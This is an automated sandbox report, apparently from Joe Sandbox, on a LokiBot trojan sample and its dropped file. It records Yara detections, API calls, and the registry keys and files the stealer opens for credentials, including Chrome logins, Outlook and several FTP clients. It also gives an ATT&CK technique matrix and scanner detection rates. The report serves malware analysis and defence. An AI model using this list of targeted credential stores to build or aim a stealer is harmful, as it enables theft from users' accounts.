                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile created: C:\Users\user\AppData\Local\Temp\dehbibhar.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exe TID: 5528Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeAPI call chain: ExitProcess graph end nodegraph_0-3759
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvplJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00406069 GetUserNameW,2_2_00406069

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: PopPassword2_2_0040D069
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: SmtpPassword2_2_0040D069
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation
                1
                Masquerading
                2
                OS Credential Dumping
                11
                Security Software Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                Credentials in Registry
                11
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Access Token Manipulation
                Security Account Manager1
                Account Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Process Injection
                NTDS1
                System Owner/User Discovery
                Distributed Component Object Model1
                Clipboard Data
                Scheduled Transfer112
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials2
                File and Directory Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync5
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                dhGoVvfmul.exe45%VirustotalBrowse
                dhGoVvfmul.exe57%ReversingLabsWin32.Trojan.LokiBot
                dhGoVvfmul.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\dehbibhar.exe46%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\dehbibhar.exe24%ReversingLabsWin32.Trojan.InjectorX
                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)24%ReversingLabsWin32.Trojan.InjectorX
                SourceDetectionScannerLabelLinkDownload
